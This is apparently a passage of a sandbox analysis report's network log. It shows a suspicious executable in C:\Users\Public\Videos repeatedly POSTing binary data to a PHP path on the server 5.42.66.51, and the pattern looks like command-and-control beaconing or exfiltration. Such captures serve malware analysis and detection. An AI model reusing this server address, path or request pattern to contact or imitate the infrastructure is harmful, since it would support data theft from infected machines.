11 | 192.168.2.5 | 49940 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:37:55.368527889 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2156
Expect: 100-continue
Oct 11, 2024 20:37:55.757078886 CEST | 2156 | OUT | (request body)
Oct 11, 2024 20:37:56.080323935 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:37:56.212604046 CEST | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:37:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.5 | 49951 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:37:57.227875948 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2128
Expect: 100-continue
Oct 11, 2024 20:37:57.576585054 CEST | 2128 | OUT | (request body)
Oct 11, 2024 20:37:57.937397003 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:37:58.053499937 CEST | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:37:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.5 | 49966 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:37:59.073103905 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2156
Expect: 100-continue
Oct 11, 2024 20:37:59.419977903 CEST | 2156 | OUT | (request body)
Oct 11, 2024 20:38:02.753798962 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:02.884623051 CEST | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:38:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.5 | 49974 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:00.193919897 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2552
Expect: 100-continue
Oct 11, 2024 20:38:00.890161037 CEST | 2552 | OUT | (request body)
Oct 11, 2024 20:38:03.889027119 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:04.036119938 CEST | 200 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:38:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.5 | 49995 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:03.976974964 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2140
Expect: 100-continue
Oct 11, 2024 20:38:04.329658985 CEST | 2140 | OUT | (request body)
Oct 11, 2024 20:38:04.671448946 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:04.813133001 CEST | 349 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:38:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 50001 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:04.443034887 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
Content-Type: application/octet-stream
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Host: 5.42.66.51
Content-Length: 2552
Expect: 100-continue
Oct 11, 2024 20:38:04.796629906 CEST | 2552 | OUT | (request body)
Oct 11, 2024 20:38:05.169455051 CEST | 225 | IN | HTTP/1.1 100 Continue
Data Ascii: HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Oct 2024 18:38:05 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                17 | 192.168.2.5 | 50002 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:05.838279963 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:06.188448906 CEST | 2156 | OUT | POST request body
                                                                                                Oct 11, 2024 20:38:06.560077906 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:06.695538044 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:06 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Oct 11, 2024 20:38:06.912292957 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:06 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                18 | 192.168.2.5 | 50003 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:08.295085907 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2544
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:08.654562950 CEST | 2544 | OUT | POST request body
                                                                                                Oct 11, 2024 20:38:09.007503033 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:09.138165951 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                19 | 192.168.2.5 | 50004 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:08.308618069 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:08.654586077 CEST | 2156 | OUT | POST request body
                                                                                                Oct 11, 2024 20:38:12.023457050 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:12.478418112 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Oct 11, 2024 20:38:12.478507996 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:11 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Oct 11, 2024 20:38:12.479088068 CEST | 374 | IN | HTTP/1.1 100 Continue


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                20 | 192.168.2.5 | 50005 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:09.272782087 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:09.623225927 CEST | 2552 | OUT | POST request body
                                                                                                Oct 11, 2024 20:38:09.964113951 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:10.093425035 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:09 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                21 | 192.168.2.5 | 50006 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:11.869066000 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:12.224672079 CEST | 2552 | OUT | POST request body
                                                                                                Oct 11, 2024 20:38:12.559078932 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:12.820523024 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:12 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                22 | 192.168.2.5 | 50007 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:12.958575010 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:13.310591936 CEST | 2552 | OUT | POST request body
                                                                                                Oct 11, 2024 20:38:13.660278082 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:13.790978909 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:13 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                23 | 192.168.2.5 | 50008 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:13.489424944 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
                                                                                                Oct 11, 2024 20:38:13.841928005 CEST | 2156 | OUT | POST request body
                                                                                                Oct 11, 2024 20:38:17.231440067 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                Oct 11, 2024 20:38:17.363260984 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:17 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                24 | 192.168.2.5 | 50009 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                Oct 11, 2024 20:38:13.972225904 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:14.326225996 CEST | 2552 | OUT | Request body
Oct 11, 2024 20:38:14.680957079 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:14.807430029 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:14 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.5 | 50010 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:15.954253912 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:16.310688972 CEST | 2552 | OUT | Request body
Oct 11, 2024 20:38:16.641030073 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:16.798054934 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:16 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
26 | 192.168.2.5 | 50011 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:17.012120962 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:17.384345055 CEST | 2552 | OUT | Request body
Oct 11, 2024 20:38:17.743748903 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:17.875227928 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:17 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
27 | 192.168.2.5 | 50012 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:18.126899004 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:18.482461929 CEST | 2552 | OUT | Request body
Oct 11, 2024 20:38:18.855479002 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:18.989119053 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:18 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
28 | 192.168.2.5 | 50013 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:18.422544956 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:18.780086994 CEST | 2156 | OUT | Request body
Oct 11, 2024 20:38:19.119211912 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:19.247859955 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:19 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
29 | 192.168.2.5 | 50014 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:19.169430971 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:19.513806105 CEST | 2552 | OUT | Request body
Oct 11, 2024 20:38:19.874109030 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:20.009227037 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:19 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
30 | 192.168.2.5 | 50015 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:20.597652912 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2156
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:20.951256990 CEST | 2156 | OUT | Request body
Oct 11, 2024 20:38:21.353313923 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:21.487262011 CEST | 349 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:21 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
31 | 192.168.2.5 | 50016 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:20.741406918 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
                                                                                                Host: 5.42.66.51
                                                                                                Content-Length: 2552
                                                                                                Expect: 100-continue
Oct 11, 2024 20:38:21.091864109 CEST | 2552 | OUT | Request body
Oct 11, 2024 20:38:21.508263111 CEST | 25 | IN | HTTP/1.1 100 Continue
Oct 11, 2024 20:38:21.641164064 CEST | 200 | IN | HTTP/1.1 200 OK
                                                                                                Server: nginx
                                                                                                Date: Fri, 11 Oct 2024 18:38:21 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: keep-alive
                                                                                                Vary: Accept-Encoding
                                                                                                Data Raw: 34 0d 0a 3d 5a 40 54 0d 0a 30 0d 0a 0d 0a
                                                                                                Data Ascii: 4=Z@T0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 50017 | 5.42.66.51 | 80 | 8412 | C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exe
Timestamp | Bytes transferred | Direction | Data
Oct 11, 2024 20:38:21.769016981 CEST | 358 | OUT | POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1
                                                                                                Content-Type: application/octet-stream
